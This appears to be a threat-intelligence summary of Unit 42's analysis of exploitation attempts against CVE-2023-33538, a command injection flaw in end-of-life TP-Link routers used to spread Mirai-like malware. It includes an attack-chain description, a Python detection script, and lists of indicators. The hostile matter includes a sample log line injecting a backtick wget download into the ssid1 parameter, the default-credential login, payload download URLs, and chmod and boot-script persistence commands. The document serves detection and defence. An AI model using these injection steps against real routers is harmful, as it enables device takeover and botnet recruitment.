
A Deep Dive Into Attempted Exploitation of CVE-2023-33538

Unit 42 observed active, automated exploitation attempts targeting CVE-2023-33538, a command injection vulnerability in end-of-life TP-Link routers, to deploy Mirai-like botnet malware. While the observed in-the-wild attacks were flawed and failed, technical analysis confirmed the vulnerability is exploitable if attackers authenticate using default credentials, allowing them to inject shell commands via the ssid1 parameter.

Sens: Immediate | Conf: high | Analyzed: 2026-04-17

Authors: Unit 42

Actors: Mirai, Condi IoT botnet

Source: Palo Alto Networks

IOCs: 4

Key Takeaways

  • Active exploitation attempts targeting CVE-2023-33538 in end-of-life TP-Link routers were observed delivering Mirai-like (Condi variant) botnet malware.
  • In-the-wild attacks were largely ineffective because they targeted the wrong parameter ('ssid' instead of 'ssid1'), lacked authentication, and relied on utilities like 'wget' missing from the router's limited BusyBox.
  • Deep-dive firmware emulation confirmed the command injection vulnerability is real and exploitable via the 'ssid1' parameter, provided the attacker is authenticated.
  • The persistence of default IoT credentials (admin:admin) turns this authenticated vulnerability into a highly practical and critical entry point.
  • The dropped malware acts as both a botnet client and a local HTTP server to host and distribute payloads to other compromised devices.

Affected Systems

  • TP-Link TL-WR940N v2 and v4
  • TP-Link TL-WR740N v1 and v2
  • TP-Link TL-WR841N v8 and v10

Vulnerabilities (CVEs)

  • CVE-2023-33538

Attack Chain

Attackers scan for vulnerable TP-Link routers and attempt to authenticate using default credentials (admin:admin). Once authenticated, they send a crafted HTTP GET request to the /userRpm/WlanNetworkRpm.htm endpoint, injecting shell commands into the ssid1 parameter. The router's httpd service processes this input without sanitization, executing the commands to download and run a Mirai-like ELF binary. The malware then establishes C2 communication, updates itself, and starts a local HTTP server to propagate to other devices.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No

The article does not provide raw detection rules, but notes that Palo Alto Networks products (Advanced Threat Prevention, Advanced URL Filtering, Cortex Xpanse) have been updated to detect and block the associated C2 infrastructure and exploit attempts.

Detection Engineering Assessment

  • EDR Visibility: None. The targeted systems are end-of-life IoT routers running custom firmware (MIPS/BusyBox), which do not support standard EDR agents.
  • Network Visibility: High. Exploitation relies on cleartext HTTP GET requests containing shell metacharacters, and the malware communicates with C2 servers using distinct, unencrypted byte patterns.
  • Detection Difficulty: Moderate. While endpoint telemetry is missing, network signatures can reliably detect the command injection attempts in the URI parameters and the specific C2 heartbeat byte sequences.

Required Log Sources

  • Network IDS/IPS
  • Web Proxy Logs
  • Firewall Traffic Logs

Hunting Hypotheses

Hypothesis | Telemetry | ATT&CK Stage | FP Risk
Look for HTTP GET requests targeting /userRpm/WlanNetworkRpm.htm where the 'ssid1' parameter contains shell metacharacters (e.g., backticks, semicolons) or common Linux commands. | Web Proxy Logs / Network IDS | Initial Access | Low
Identify outbound network connections from IoT device IP ranges to unfamiliar external IPs on TCP port 80 or custom high ports (1024-65535), especially following inbound HTTP management traffic. | Firewall Traffic Logs | Command and Control | Medium
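The first hypothesis as runnable hunting logic, added here as an example rather than taken from the Unit 42 article: it parses simplified proxy log lines (a constructed "<client> <method> <url>" format), percent-decodes the ssid1 parameter on the vulnerable endpoint, and flags shell metacharacters, command keywords, or values longer than a real SSID can be. It also checks the plain 'ssid' parameter, since that is what the flawed in-the-wild attempts actually targeted; the 32-byte SSID limit and the keyword list are the author's choices, not from the article.

```python
import re
from typing import Optional
from urllib.parse import urlsplit, parse_qs

VULN_PATH = "/userRpm/WlanNetworkRpm.htm"
# ssid1 is the injectable parameter; ssid is the one the observed (failed) attempts used.
SSID_PARAMS = ("ssid1", "ssid")
SHELL_META = re.compile(r"[`;|&$(){}<>]")
CMD_WORDS = re.compile(r"\b(wget|curl|tftp|chmod|busybox|sh|echo)\b")
MAX_SSID_LEN = 32  # 802.11 SSIDs are at most 32 bytes; anything longer is anomalous


def inspect_request(method: str, url: str) -> Optional[dict]:
    """Return a finding for a request that looks like an ssid1 injection attempt, else None."""
    parts = urlsplit(url)
    if method.upper() != "GET" or parts.path != VULN_PATH:
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    for name in SSID_PARAMS:
        for value in qs.get(name, []):
            reasons = []
            if SHELL_META.search(value):
                reasons.append("shell metacharacters")
            if CMD_WORDS.search(value):
                reasons.append("command keyword")
            if len(value) > MAX_SSID_LEN:
                reasons.append(f"length {len(value)} > {MAX_SSID_LEN}")
            if reasons:
                return {"param": name, "value": value, "reasons": reasons}
    return None


def scan_log(lines):
    """Yield (client_ip, finding) for each suspicious line; unparsable lines are skipped."""
    for line in lines:
        fields = line.split(maxsplit=2)
        if len(fields) != 3:
            continue
        client, method, url = fields
        finding = inspect_request(method, url)
        if finding:
            yield client, finding


# Constructed sample lines: a benign SSID change, an injection attempt, an unrelated page.
SAMPLE_LOG = [
    "10.0.0.5 GET http://192.168.0.1/userRpm/WlanNetworkRpm.htm?ssid1=HomeWiFi&region=1",
    "203.0.113.7 GET http://192.168.0.1/userRpm/WlanNetworkRpm.htm?ssid1=%60wget+http%3A%2F%2Fexample.invalid%2Fx+-O+%2Ftmp%2Fx%60",
    "10.0.0.8 GET http://192.168.0.1/userRpm/StatusRpm.htm",
]

if __name__ == "__main__":
    for client, finding in scan_log(SAMPLE_LOG):
        print(client, finding)
```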

Control Gaps

  • Lack of endpoint visibility on IoT devices
  • Exposure of router web management interfaces to the public internet
  • Use of default credentials on network appliances

Key Behavioral Indicators

  • HTTP GET requests to /userRpm/WlanNetworkRpm.htm with anomalous ssid1 lengths or characters
  • Unexpected reboots of router devices
  • Outbound traffic from routers matching Mirai C2 byte patterns (e.g., 0x99 0x66 0x33)

False Positive Assessment

  • Low. Legitimate administrative changes to the SSID will not contain shell commands, backticks, or semicolons. Network traffic matching the specific Mirai C2 byte patterns is highly indicative of compromise.

Recommendations

Immediate Mitigation

  • Change default credentials (admin:admin) on all TP-Link routers immediately.
  • Block access to the router's web management interface from the public internet.

Infrastructure Hardening

  • Replace end-of-life TP-Link router models (TL-WR940N, TL-WR740N, TL-WR841N) with supported hardware.
  • Implement network segmentation to isolate IoT devices from critical network assets.

User Protection

  • Ensure remote workers are not using vulnerable, end-of-life routers for home networks connecting to corporate VPNs.

Security Awareness

  • Educate users and administrators on the critical risks of leaving default credentials on IoT and networking equipment.

MITRE ATT&CK Mapping

  • T1190 - Exploit Public-Facing Application
  • T1078.001 - Valid Accounts: Default Accounts
  • T1059.004 - Command and Scripting Interpreter: Unix Shell
  • T1105 - Ingress Tool Transfer
  • T1037 - Boot or Logon Initialization Scripts

Additional IOCs

  • IPs:
    • 46[.]105[.]174[.]146 - IP address observed in the Host header of the HTTP GET exploit request.
  • URLs:
    • hxxp://bot[.]ddosvps[.]cc/top1hbt.arm - Payload download URL for ARM architecture.
    • hxxp://bot[.]ddosvps[.]cc/top1hbt.arm5 - Payload download URL for ARM5 architecture.
    • hxxp://bot[.]ddosvps[.]cc/top1hbt.arm6 - Payload download URL for ARM6 architecture.
    • hxxp://bot[.]ddosvps[.]cc/top1hbt.arm7 - Payload download URL for ARM7 architecture.
    • hxxp://bot[.]ddosvps[.]cc/top1hbt.mips - Payload download URL for MIPS architecture.
    • hxxp://bot[.]ddosvps[.]cc/top1hbt.mpsl - Payload download URL for MPSL architecture.
    • hxxp://bot[.]ddosvps[.]cc/top1hbt.x86_64 - Payload download URL for x86_64 architecture.
    • hxxp://bot[.]ddosvps[.]cc/top1hbt.sh4 - Payload download URL for SH4 architecture.
    • hxxp://51[.]38[.]137[.]113/arm - Direct IP payload download URL for ARM architecture.
    • hxxp://51[.]38[.]137[.]113/arm5 - Direct IP payload download URL for ARM5 architecture.
    • hxxp://51[.]38[.]137[.]113/arm6 - Direct IP payload download URL for ARM6 architecture.
    • hxxp://51[.]38[.]137[.]113/x86_64 - Direct IP payload download URL for x86_64 architecture.
    • hxxp://51[.]38[.]137[.]113/mips - Direct IP payload download URL for MIPS architecture.
    • hxxp://51[.]38[.]137[.]113/sh4 - Direct IP payload download URL for SH4 architecture.
  • File Hashes:
    • 3fbd2a2e82ceb5e91eadbad02cb45ac618324da9b1895d81ebe7de765dca30e7 (SHA256) - ELF binary archive (arm) downloaded from malicious server.
    • 4caaa18982cd4056fead54b98d57f9a2a1ddd654cf19a7ba2366dfadbd6033da (SHA256) - ELF binary archive (arm5) downloaded from malicious server.
    • 9df711c3aef2bba17b622ddfd955452f8d8eb55899528fbc13d9540c52f13402 (SHA256) - ELF binary archive (arm6) downloaded from malicious server.
    • 00078aeeaca54b5d3c1237e964e9f956690b782e4ea160d81edc3c6b44e7f620 (SHA256) - httpd ELF binary extracted from TP-Link firmware.
    • 534b654531a6a540a144da9545ee343e1046f843d7de4c1091b46c3ee66a508b (SHA256) - ELF binary archive (mips) downloaded from malicious server.
    • 919f292a07a37f163f88527e725406187c8ecc637387ad24853fe49ce4e6ddf4 (SHA256) - ELF binary archive (sh4) downloaded from malicious server.
    • c321933e4e5970ba7299fe21778dab9398994c22ca0ba0422c6cbc3fbb95ea26 (SHA256) - TP-Link firmware image wr940n_us_3_16_9_up_boot(160617).bin.
    • 56f21f412e898ad9e3ee05d5f44c44d9d7bcb9ecbfbdb9de11b8fa5a637aeef6 (SHA256) - ELF binary archive (x86_64) downloaded from malicious server.
  • File Paths:
    • /tmp/arm7 - Path where the malicious payload is downloaded and executed on the router.
    • /etc/rc.d/rcS - Router boot script targeted by attackers to establish persistence.
    • /userRpm/WlanNetworkRpm.htm - Vulnerable endpoint used for command injection via the ssid1 parameter.
  • Command Lines:
    • Purpose: Modify permissions to make the downloaded payload executable. | Tools: chmod | Stage: Execution | chmod 777 /tmp/arm7
    • Purpose: Overwrite system boot scripts to establish persistence across reboots. | Tools: echo | Stage: Persistence | echo <payload> > /etc/rc.d/rcS
  • Other:
    • YWRtaW46YWRtaW4= - Base64 encoded default credentials (admin:admin) observed in exploit attempts.